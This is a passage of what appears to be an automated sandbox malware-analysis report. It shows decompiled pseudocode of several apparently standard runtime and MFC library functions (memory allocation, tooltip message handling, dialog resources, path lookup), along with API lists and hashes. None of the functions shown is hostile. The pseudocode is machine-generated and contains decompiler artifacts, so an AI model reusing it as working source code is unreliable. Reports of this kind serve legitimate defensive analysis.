				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
				if(_t49 != 0) {
					_t70 = _t77 + 0x7000;
					if(_t77 <= _t70) {
						_t55 = _t77 + 0x10;
						do {
							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
							 *_t55 = _t55 + 0xffc;
							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
							_t55 = _t55 + 0x1000;
						} while (_t55 - 0x10 <= _t70);
					}
					_t61 = _t77 + 0xc;
					_t51 = _v8 + 0x1f8;
					_t78 = 1;
					 *((intOrPtr*)(_t51 + 4)) = _t61;
					 *((intOrPtr*)(_t61 + 8)) = _t51;
					_t62 = _t70 + 0xc;
					 *((intOrPtr*)(_t51 + 8)) = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t51;
					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
					_t52 =  *((intOrPtr*)(_t81 + 0x43));
					_t53 = _a4;
					 *((char*)(_t81 + 0x43)) = _t52 + 1;
					if(_t52 == 0) {
						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
					}
					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
					_t54 = _t57;
				} else {
					_t54 = _t49 | 0xffffffff;
				}
				return _t54;
			}

0x0040819c
0x004081a2
0x004081a5
0x004081a8
0x004081aa
0x004081ae
0x004081b0
0x004081b0
0x004081bd
0x004081be
0x004081c5
0x004081c8
0x004081c8
0x004081cb
0x004081ce
0x004081d1
0x004081d1
0x004081db
0x004081e9
0x004081f1
0x004081fb
0x00408203
0x00408205
0x00408208
0x00408208
0x0040820c
0x00408219
0x00408220
0x00408228
0x0040822b
0x00408235
0x0040823d
0x00408208
0x00408244
0x00408247
0x0040824e
0x0040824f
0x00408252
0x00408255
0x00408258
0x0040825b
0x0040825e
0x00408263
0x0040826a
0x00408273
0x00408276
0x00408279
0x0040827b
0x0040827b
0x00408289
0x0040828c
0x004081f3
0x004081f3
0x004081f3
0x00408292

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00407EBE,000000E0,00000000,?,?,?,004063F8), ref: 004081E9

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
Instruction ID: a951a9915c6437c0f42f98627e617b565139ecfdaa8fc563ef3f50a1ca92f44d
Opcode Fuzzy Hash: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
Instruction Fuzzy Hash: FC319A316006068FD314CF18C984BA5BBE0FF50364F2482BED5598B3E2DB74A906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00407333, Relevance: 1.3, APIs: 1, Instructions: 56
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00407333(signed int _a4, signed int _a8) {
				void* _t8;
				long _t11;
				void* _t13;
				long _t15;
				void* _t17;
				void* _t23;

				_t15 = _a4 * _a8;
				_t11 = _t15;
				if(_t15 <= 0xffffffe0) {
					if(_t15 == 0) {
						_t15 = 1;
					}
					_t15 = _t15 + 0x0000000f & 0xfffffff0;
				}
				while(1) {
					_t13 = 0;
					if(_t15 > 0xffffffe0) {
						goto L8;
					}
					_t23 = _t11 -  *0x436fa8; // 0x3f8
					if(_t23 > 0) {
						L7:
						_t13 = HeapAlloc( *0x43b63c, 8, _t15);
						if(_t13 != 0) {
							L12:
							return _t13;
						}
						goto L8;
					}
					E004079D4(9);
					_push(_t11); // executed
					_t8 = E00407DDE(); // executed
					_t13 = _t8;
					E00407A35(9);
					_t17 = _t17 + 0xc;
					if(_t13 != 0) {
						E00406330(_t13, 0, _t11);
						goto L12;
					}
					goto L7;
					L8:
					if( *0x439d64 == 0) {
						goto L12;
					}
					if(E00407954(_t15) == 0) {
						return 0;
					}
				}
			}

0x0040733a
0x00407342
0x00407344
0x00407348
0x0040734c
0x0040734c
0x00407350
0x00407350
0x00407353
0x00407353
0x00407358
0x00000000
0x00000000
0x0040735a
0x00407360
0x0040737f
0x0040738e
0x00407392
0x004073b6
0x00000000
0x004073b6
0x00000000
0x00407392
0x00407364
0x00407369
0x0040736a
0x00407371
0x00407373
0x00407378
0x0040737d
0x004073ae
0x00000000
0x004073b3
0x00000000
0x00407394
0x0040739b
0x00000000
0x00000000
0x004073a6
0x00000000
0x004073bc
0x004073a8

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
Instruction ID: 3f3aad503001cd6b8f63a7fd222fe274e9ba08c9a4469d1d6c832ccce610b396
Opcode Fuzzy Hash: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
Instruction Fuzzy Hash: B901F522E086106AF62166296C42B6B22059B807A9F1A0137FE54772D2D6787C01E1EF

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00410E05, Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00410E05(signed int __ecx) {
				signed int _t116;
				signed int _t119;
				signed int _t120;
				struct HWND__* _t124;
				signed int _t126;
				intOrPtr _t127;
				signed char _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				void* _t160;
				intOrPtr* _t167;
				signed int _t169;
				signed int _t182;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t198;
				void* _t200;
				signed short _t208;
				intOrPtr _t211;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t116 = E00406520(E0042AA5D, _t215);
				_t218 = _t217 - 0x74;
				_t167 =  *((intOrPtr*)(_t215 + 8));
				_t208 =  *(_t167 + 4);
				_t198 = __ecx;
				 *(_t215 - 0x10) = __ecx;
				 *(_t215 - 0x1c) = _t208;
				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
					_t116 = GetKeyState(1);
					if(_t116 < 0) {
						L49:
						_t208 =  *(_t215 - 0x1c);
						goto L50;
					}
					_t116 = GetKeyState(2);
					if(_t116 < 0) {
						goto L49;
					}
					_t116 = GetKeyState(4);
					if(_t116 < 0) {
						goto L49;
					} else {
						_push( *_t167);
						L9:
						_t116 = E00413740(_t215);
						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
							_push(GetParent( *(_t116 + 0x1c)));
							goto L9;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							_t211 = E00425C92(0x4397cc, E0042440D);
							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
							_t169 =  *(_t211 + 0xcc);
							_t119 = E00414D17(_t198);
							__eflags = _t169;
							 *(_t215 - 0x14) = _t119;
							if(_t169 == 0) {
								L19:
								_t120 = E004131DD(0x58);
								 *(_t215 - 0x1c) = _t120;
								_t169 = 0;
								__eflags = _t120;
								 *(_t215 - 4) = 0;
								if(__eflags != 0) {
									_t169 = E00410AA2(_t120);
								}
								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
								_push(1);
								_t116 = E00410AF7(_t169, __eflags,  *(_t215 - 0x14));
								__eflags = _t116;
								if(_t116 != 0) {
									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
									_t198 =  *(_t215 - 0x10);
									 *(_t211 + 0xcc) = _t169;
									L25:
									E00406330(_t215 - 0x54, 0, 0x2c);
									_t124 =  *(_t198 + 0x1c);
									_t220 = _t218 + 0xc;
									 *(_t215 - 0x4c) = _t124;
									 *(_t215 - 0x48) = _t124;
									 *(_t215 - 0x54) = 0x28;
									 *(_t215 - 0x50) = 1;
									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
									__eflags = _t126;
									if(_t126 == 0) {
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
									}
									_t127 =  *((intOrPtr*)(_t215 + 8));
									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
									 *(_t215 - 0x28) =  *(_t127 + 0x14);
									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
									E00406330(_t215 - 0x80, 0, 0x2c);
									_t221 = _t220 + 0xc;
									 *(_t215 - 0x80) = 0x28;
									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
									 *(_t215 - 0x1c) = _t116;
									asm("sbb ecx, ecx");
									_t182 =  ~(_t116 + 1) & _t198;
									__eflags =  *(_t211 + 0xd4) - _t116;
									 *(_t215 - 0x14) = _t182;
									if( *(_t211 + 0xd4) != _t116) {
										L33:
										__eflags = _t116 - 0xffffffff;
										if(_t116 == 0xffffffff) {
											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
											L42:
											E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
											__eflags =  *(_t211 + 0xd8) - 0x28;
											_t91 = _t211 + 0xd8; // 0xd8
											_t200 = _t91;
											if( *(_t211 + 0xd8) >= 0x28) {
												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
											}
											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
											_t183 = 0xb;
											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
											goto L45;
										}
										_t186 = 0xb;
										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
										_t221 = _t221 + 0xc;
										_t188 =  *(_t215 - 0x10);
										 *(_t215 - 0x50) = _t141;
										__eflags =  *(_t188 + 0x24) & 0x00000400;
										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
											_t150 = _t141 | 0x00000020;
											__eflags = _t150;
											 *(_t215 - 0x50) = _t150;
										}
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
										__eflags =  *(_t215 - 0x79) & 0x00000040;
										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
											L38:
											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
											_t145 =  *(_t215 - 0x10);
											__eflags =  *(_t145 + 0x24) & 0x00000400;
											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
											}
											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
											goto L41;
										} else {
											_t149 = E00414D5B( *(_t215 - 0x10));
											__eflags = _t149;
											if(_t149 == 0) {
												L41:
												_t211 =  *((intOrPtr*)(_t215 - 0x18));
												goto L42;
											}
											goto L38;
										}
									} else {
										__eflags =  *(_t211 + 0xd0) - _t182;
										if( *(_t211 + 0xd0) != _t182) {
											goto L33;
										}
										__eflags =  *(_t198 + 0x25) & 0x00000004;
										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
											__eflags = _t116 - 0xffffffff;
											if(_t116 != 0xffffffff) {
												_t116 = E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
											}
										} else {
											GetCursorPos(_t215 - 0x20);
											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
										}
										L45:
										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
											__eflags =  *(_t215 - 0x60);
											if( *(_t215 - 0x60) == 0) {
												_t116 = E004062E0( *((intOrPtr*)(_t215 - 0x5c)));
											}
										}
										goto L78;
									}
								} else {
									__eflags = _t169;
									if(_t169 != 0) {
										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
									}
									goto L78;
								}
							}
							_t160 = E00404FFE(_t169);
							__eflags = _t160 -  *(_t215 - 0x14);
							if(_t160 !=  *(_t215 - 0x14)) {
								 *((intOrPtr*)( *_t169 + 0x58))();
								 *((intOrPtr*)( *_t169 + 4))(1);
								_t169 = 0;
								__eflags = 0;
								 *(_t211 + 0xcc) = 0;
							}
							__eflags = _t169;
							if(_t169 != 0) {
								goto L25;
							} else {
								goto L19;
							}
						} else {
							__eflags = _t116;
							if(_t116 == 0) {
								_t116 = E00425C92(0x4397cc, E0042440D);
								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
							}
							goto L78;
						}
					}
				} else {
					L50:
					__eflags =  *(_t198 + 0x24) & 0x00000401;
					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
						L78:
						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
						return _t116;
					}
					_push( *_t167);
					while(1) {
						_t116 = E00413740(_t215);
						__eflags = _t116;
						if(_t116 == 0) {
							break;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							L57:
							__eflags = _t208 - 0x100;
							if(_t208 < 0x100) {
								L59:
								__eflags = _t208 - 0x104;
								if(_t208 < 0x104) {
									L62:
									_t116 = 0;
									__eflags = 0;
									L63:
									__eflags =  *(_t198 + 0x25) & 0x00000004;
									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
										goto L78;
									}
									__eflags = _t116;
									if(_t116 != 0) {
										L77:
										_t116 = E00414026(_t116);
										goto L78;
									}
									__eflags = _t208 - 0x201;
									if(_t208 == 0x201) {
										goto L77;
									}
									__eflags = _t208 - 0x203;
									if(_t208 == 0x203) {
										goto L77;
									}
									__eflags = _t208 - 0x204;
									if(_t208 == 0x204) {
										goto L77;
									}
									__eflags = _t208 - 0x206;
									if(_t208 == 0x206) {
										goto L77;
									}
									__eflags = _t208 - 0x207;
									if(_t208 == 0x207) {
										goto L77;
									}
									__eflags = _t208 - 0x209;
									if(_t208 == 0x209) {
										goto L77;
									}
									__eflags = _t208 - 0xa1;
									if(_t208 == 0xa1) {
										goto L77;
									}
									__eflags = _t208 - 0xa3;
									if(_t208 == 0xa3) {
										goto L77;
									}
									__eflags = _t208 - 0xa4;
									if(_t208 == 0xa4) {
										goto L77;
									}
									__eflags = _t208 - 0xa6;
									if(_t208 == 0xa6) {
										goto L77;
									}
									__eflags = _t208 - 0xa7;
									if(_t208 == 0xa7) {
										goto L77;
									}
									__eflags = _t208 - 0xa9;
									if(_t208 != 0xa9) {
										goto L78;
									}
									goto L77;
								}
								__eflags = _t208 - 0x107;
								if(_t208 > 0x107) {
									goto L62;
								}
								L61:
								_t116 = 1;
								goto L63;
							}
							__eflags = _t208 - 0x108;
							if(_t208 <= 0x108) {
								goto L61;
							}
							goto L59;
						}
						__eflags =  *(_t116 + 0x24) & 0x00000401;
						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t116 + 0x1c)));
					}
					__eflags = _t116 - _t198;
					if(_t116 != _t198) {
						goto L78;
					}
					goto L57;
				}
			}

0x00410e0a
0x00410e0f
0x00410e13
0x00410e18
0x00410e1b
0x00410e23
0x00410e26
0x00410e29
0x00410e57
0x00410e5c
0x0041118f
0x0041118f
0x00000000
0x0041118f
0x00410e64
0x00410e69
0x00000000
0x00000000
0x00410e71
0x00410e76
0x00000000
0x00410e7c
0x00410e7c
0x00410e7e
0x00410e7e
0x00410e85
0x00410e98
0x00000000
0x00410e98
0x00410e9b
0x00410e9d
0x00410ed8
0x00410edc
0x00410edf
0x00410ee5
0x00410eea
0x00410eec
0x00410eef
0x00410f19
0x00410f1b
0x00410f21
0x00410f24
0x00410f26
0x00410f28
0x00410f2b
0x00410f34
0x00410f34
0x00410f36
0x00410f3a
0x00410f41
0x00410f46
0x00410f48
0x00410f6c
0x00410f72
0x00410f75
0x00410f7b
0x00410f83
0x00410f88
0x00410f8b
0x00410f8e
0x00410f91
0x00410f97
0x00410fa6
0x00410fb0
0x00410fb6
0x00410fb8
0x00410fc8
0x00410fc8
0x00410fce
0x00410fd7
0x00410fde
0x00410fe4
0x00410ff2
0x00410ff7
0x00410fff
0x0041100f
0x00411014
0x0041101a
0x0041101c
0x0041101e
0x00411024
0x00411027
0x0041107b
0x0041107b
0x0041107e
0x00411187
0x00411116
0x0041111a
0x0041111f
0x00411126
0x00411126
0x0041112c
0x00411139
0x00411139
0x00411144
0x0041114d
0x00411153
0x00411157
0x00000000
0x00411157
0x00411089
0x00411095
0x00411095
0x00411097
0x0041109f
0x004110a2
0x004110a5
0x004110a7
0x004110a7
0x004110a9
0x004110a9
0x004110bb
0x004110c1
0x004110c5
0x004110d3
0x004110de
0x004110e4
0x004110e7
0x004110ea
0x004110fa
0x004110fa
0x0041110d
0x00000000
0x004110c7
0x004110ca
0x004110cf
0x004110d1
0x00411113
0x00411113
0x00000000
0x00411113
0x00000000
0x004110d1
0x00411029
0x00411029
0x0041102f
0x00000000
0x00000000
0x00411031
0x00411035
0x00411064
0x00411067
0x00411071
0x00411071
0x00411037
0x0041103b
0x00411059
0x00411059
0x00411159
0x00411159
0x0041115d
0x00411163
0x00411167
0x00411170
0x00411175
0x00411167
0x00000000
0x0041115d
0x00410f4a
0x00410f4a
0x00410f4c
0x00410f58
0x00410f58
0x00000000
0x00410f4c
0x00410f48
0x00410ef3
0x00410ef8
0x00410efb
0x00410f01
0x00410f0a
0x00410f0d
0x00410f0d
0x00410f0f
0x00410f0f
0x00410f15
0x00410f17
0x00000000
0x00000000
0x00000000
0x00000000
0x00410e9f
0x00410e9f
0x00410ea1
0x00410eb1
0x00410eb6
0x00410ebd
0x00410ebd
0x00000000
0x00410ea1
0x00410e9d
0x00411192
0x00411192
0x00411192
0x00411198
0x00411260
0x00411266
0x0041126e
0x0041126e
0x0041119e
0x004111a0
0x004111a0
0x004111a5
0x004111a7
0x00000000
0x00000000
0x004111a9
0x004111ab
0x004111c9
0x004111c9
0x004111cf
0x004111d9
0x004111d9
0x004111df
0x004111ee
0x004111ee
0x004111ee
0x004111f0
0x004111f0
0x004111f4
0x00000000
0x00000000
0x004111f6
0x004111f8
0x0041125a
0x0041125b
0x00000000
0x0041125b
0x004111fa
0x00411200
0x00000000
0x00000000
0x00411202
0x00411208
0x00000000
0x00000000
0x0041120a
0x00411210
0x00000000
0x00000000
0x00411212
0x00411218
0x00000000
0x00000000
0x0041121a
0x00411220
0x00000000
0x00000000
0x00411222
0x00411228
0x00000000
0x00000000
0x0041122a
0x00411230
0x00000000
0x00000000
0x00411232
0x00411238
0x00000000
0x00000000
0x0041123a
0x00411240
0x00000000
0x00000000
0x00411242
0x00411248
0x00000000
0x00000000
0x0041124a
0x00411250
0x00000000
0x00000000
0x00411252
0x00411258
0x00000000
0x00000000
0x00000000
0x00411258
0x004111e1
0x004111e7
0x00000000
0x00000000
0x004111e9
0x004111eb
0x00000000
0x004111eb
0x004111d1
0x004111d7
0x00000000
0x00000000
0x00000000
0x004111d7
0x004111ad
0x004111b3
0x00000000
0x00000000
0x004111be
0x004111be
0x004111c1
0x004111c3
0x00000000
0x00000000
0x00000000
0x004111c3

APIs

__EH_prolog.LIBCMT ref: 00410E0A
GetKeyState.USER32(00000001), ref: 00410E57
GetKeyState.USER32(00000002), ref: 00410E64
GetKeyState.USER32(00000004), ref: 00410E71
GetParent.USER32(?), ref: 00410E92
SendMessageA.USER32 ref: 00410F6C
SendMessageA.USER32 ref: 00410FB0
SendMessageA.USER32 ref: 00410FC8
ScreenToClient.USER32 ref: 00410FE4
GetCursorPos.USER32(?), ref: 0041103B
SendMessageA.USER32 ref: 00411059
SendMessageA.USER32 ref: 004110BB
SendMessageA.USER32 ref: 004110DE
SendMessageA.USER32 ref: 004110FA
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0041110D
SendMessageA.USER32 ref: 00411139
SendMessageA.USER32 ref: 00411187
GetParent.USER32(?), ref: 004111B8

Strings

(, xrefs: 00410F97
(, xrefs: 00410FFF
@, xrefs: 004110C1

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
String ID: ($($@
API String ID: 986702660-2846432479
Opcode ID: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
Instruction ID: 13d5465373c71cfe337dff1ba131fcf840a9d493356aa9c13fb6cf6503e8bb35
Opcode Fuzzy Hash: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
Instruction Fuzzy Hash: 00C1A671A00315ABDF249F94CC85BEEBB75AF08704F10412BEB15BB2E1D7B898C58B59

Uniqueness

Uniqueness Score: -1.00%

Function 00412121, Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412121(intOrPtr* __ecx) {
				void* __esi;
				signed int _t40;
				struct HWND__* _t44;
				signed int _t48;
				signed char _t53;
				struct HWND__* _t55;
				struct HINSTANCE__* _t60;
				void* _t62;
				void* _t73;
				intOrPtr* _t77;
				void* _t79;
				void* _t81;

				E00406520(E00429CE8, _t79);
				_t77 = __ecx;
				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x18;
				 *((intOrPtr*)(_t79 - 0x1c)) = __ecx;
				_t73 =  *(__ecx + 0x44);
				 *(_t79 - 0x18) =  *(__ecx + 0x48);
				_t40 = E00424BFB();
				_t60 =  *(_t40 + 0xc);
				if( *(_t77 + 0x40) != 0) {
					_t60 =  *(E00424BFB() + 0xc);
					_t40 = LoadResource(_t60, FindResourceA(_t60,  *(_t77 + 0x40), 5));
					_t73 = _t40;
				}
				if(_t73 != 0) {
					_t40 = LockResource(_t73);
					 *(_t79 - 0x18) = _t40;
				}
				if( *(_t79 - 0x18) != 0) {
					 *(_t79 - 0x14) = E004120A5(_t77);
					E00413C3E();
					__eflags =  *(_t79 - 0x14);
					 *(_t79 - 0x20) = 0;
					if( *(_t79 - 0x14) != 0) {
						_t55 = IsWindowEnabled( *(_t79 - 0x14));
						__eflags = _t55;
						if(_t55 != 0) {
							EnableWindow( *(_t79 - 0x14), 0);
							 *(_t79 - 0x20) = 1;
						}
					}
					_push(_t77);
					 *(_t79 - 4) = 0;
					"VWh\rDB"();
					_t44 = E00411E32(_t77,  *(_t79 - 0x18), E00413740(_t79,  *(_t79 - 0x14)), _t60);
					__eflags = _t44;
					if(_t44 != 0) {
						__eflags =  *(_t77 + 0x24) & 0x00000010;
						if(( *(_t77 + 0x24) & 0x00000010) != 0) {
							_t62 = 4;
							_t53 = E00416528(_t77);
							__eflags = _t53 & 0x00000001;
							if((_t53 & 0x00000001) != 0) {
								_t62 = 5;
							}
							_push(_t62);
							E00415F1B(_t77);
						}
						__eflags =  *(_t77 + 0x1c);
						if( *(_t77 + 0x1c) != 0) {
							E0041663D(_t77, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					__eflags =  *(_t79 - 0x20);
					if( *(_t79 - 0x20) != 0) {
						EnableWindow( *(_t79 - 0x14), 1);
					}
					__eflags =  *(_t79 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t77 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t79 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t77 + 0x58))();
					E004120DF(_t77, _t77, __eflags);
					_t48 =  *(_t77 + 0x2c);
				} else {
					_t48 = _t40 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
				return _t48;
			}

0x00412126
0x00412130
0x00412133
0x00412136
0x0041213c
0x0041213f
0x00412142
0x0041214b
0x0041214e
0x00412155
0x00412166
0x0041216c
0x0041216c
0x00412170
0x00412173
0x00412179
0x00412179
0x00412180
0x00412191
0x00412194
0x0041219b
0x0041219e
0x004121a1
0x004121a6
0x004121ac
0x004121ae
0x004121b4
0x004121ba
0x004121ba
0x004121ae
0x004121c1
0x004121c2
0x004121c5
0x004121d9
0x004121de
0x004121e0
0x004121e2
0x004121e6
0x004121ec
0x004121ed
0x004121f2
0x004121f5
0x004121f9
0x004121f9
0x004121fa
0x004121fd
0x004121fd
0x00412202
0x00412205
0x00412213
0x00412213
0x00412205
0x00412234
0x00412238
0x0041223b
0x00412242
0x00412242
0x00412248
0x0041224b
0x00412253
0x00412256
0x0041225b
0x0041225b
0x00412256
0x00412265
0x0041226a
0x0041226f
0x00412182
0x00412182
0x00412182
0x00412277
0x00412280

APIs

__EH_prolog.LIBCMT ref: 00412126
FindResourceA.KERNEL32(?,00000000,00000005), ref: 0041215E
LoadResource.KERNEL32(?,00000000), ref: 00412166

Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63

LockResource.KERNEL32(?), ref: 00412173
IsWindowEnabled.USER32(?), ref: 004121A6
EnableWindow.USER32(?,00000000), ref: 004121B4
EnableWindow.USER32(?,00000001), ref: 00412242
GetActiveWindow.USER32 ref: 0041224D
SetActiveWindow.USER32(?), ref: 0041225B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
Instruction ID: 29e84b16fa1c15ce6d6e5a6389cc251cef0e56d6ff14e1849cc81362d4330516
Opcode Fuzzy Hash: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
Instruction Fuzzy Hash: 0841C331A00604AFCB21AF65CA45AEFBBB5FF44715F10011FF502E2291CBB99D91CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417B29, Relevance: 12.1, APIs: 8, Instructions: 72
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00417B29() {
				CHAR* _t29;
				CHAR* _t36;
				void* _t38;
				CHAR* _t47;
				void* _t53;

				E00406520(E0042A77C, _t53);
				_t47 =  *(_t53 + 8);
				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
					_t29 =  *0x436980; // 0x436994
					 *(_t53 + 8) = _t29;
					_push(_t53 + 8);
					 *(_t53 - 4) = 0;
					E00417BF9(_t53, _t47);
					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
							CharUpperA(_t47);
						}
						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
							if(_t38 != 0xffffffff) {
								FindClose(_t38);
								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
							}
						}
						_push(1);
						_pop(0);
					}
